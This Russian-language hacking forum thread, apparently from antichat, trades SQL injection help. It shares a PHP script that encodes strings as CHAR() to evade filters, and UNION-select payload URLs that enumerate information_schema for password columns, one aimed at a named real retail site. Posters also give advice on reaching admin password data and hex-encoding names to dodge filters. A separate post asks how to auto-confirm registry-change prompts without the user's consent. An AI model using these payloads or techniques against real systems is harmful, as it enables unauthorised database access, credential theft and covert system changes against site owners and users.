PHP: <?php function form(){ echo "<hr>"; echo "<form action=? method=GET>"; echo "Word:<input name=string type=text>"; echo "<input type=submit value=OK>"; echo "</form>"; } if (!isset($_GET['string'])){ form(); exit; } $string=$_GET['string']; for ($i=0;$i<strlen($string);$i++){ $str_arr[$i]=substr($string,$i,1); } $result=''; for ($i=0;$i<count($str_arr);$i++){ if ($i==count($str_arr)-1){ $result=$result.ord($str_arr[$i]); }else{ $result=$result.ord($str_arr[$i]).","; } } echo "<textarea>char(".$result.")</textarea>"; form(); ?> Вот, накатал быстро, если еще кому-то надо, энкодит слово в чар.
mailbrush, в разных диалектах SQL по разному применяется функция CHAR... Так же в разных диалектах по разному используется операция "конкатенация", поэтому возможно ещё варианты... Хорошо, если бы ты ещё предусмотрел переключатель - MySQL, MSSQL, Oracle... Цены бы тебе не было!
К чему ещё один "велосипед"? К тому же, пару страниц назад Sabe скинул ссылку на сайт, который "энкодит слово в чар", причем можно энкодить как для MySQL, так и для MSSQL и Oracle.
идиотством страдаю,пока на все 100% не закреплю ,дальше не пойду) http://localhost/view_cat.php?cat=-1+union+select+1,column_name,3,4,5,6,7,8,9+from+information_schema.columns+where+column_name=char(97,100,100,101,100,114,101,113,117,101,115,116,115)+limit+1,1 Точно знаю, что в таблице есть строки addedrequests-название таблицы но выводит,что запрос прошел,однако данных нет!
kevmen А может всё-же почитать что-то нужно? Статьи ведь пишут не для того, что-бы сдесь их по новой всем индивидуально перессказывать http://localhost/view_cat.php?cat=-1+union+select+1,column_name,3,4,5,6,7,8,9+from+in formation_schema.columns+where+column_name=char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)+ limit+1,1 Столбец, из шемы, где столбец. Видимо ты хотел написать, +where+table_name='имя_таблицы'
jokester ЧитаЛ Читаю вот https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597 и вот http://forum.antichat.ru/thread43966.html
kevmen переведи свой запрос, у тебя получается вывести названия строк где имя строки char(97 ,100,100,101,100,114,101,113,117,101,115,116,115), а тебе надо вывести названия строк, где имя таблицы char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)
попробуй составить запрос типа http://www.technodom.kz/index.php?go=news&news=1+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+column_name+like+char(37,112,97,115,115,37)&q=wNW616thoUBWHv3 запрос типа вывести все строки, где имеется словосочетание pass, попробуй вместо pass подставить login, name итд...
Не выходит Скорее всего админ хранит пассы в другой бд, кто знает подскажите как определить в какой и как туда попасть?
Всем привет! Я чайник, даже самовар большая просьба ко всем кто в курсе, ответить Можно ли сделать так, что во время появления на экране окошка с предложением изменения реестра да - нет, запустить программу, которая сама нажмёт кнопку да, как только появиться это окно проще говоря, чтобы запись в реестр проходила без запроса у пользователя. Можно так или нет? Если да то как??
попробуй так table_name=любая стандартная таблица должна вывести имя бд где находиться стандартная таблица COLLATIONS, P.s если есть фильтры имя таблицы напиши в hex'e
pinky07, Ты с ума сошёл? Ты сейчас его только запутаешь... Gemini12, Ничего кроме users не нашел, видимо, не судьба.
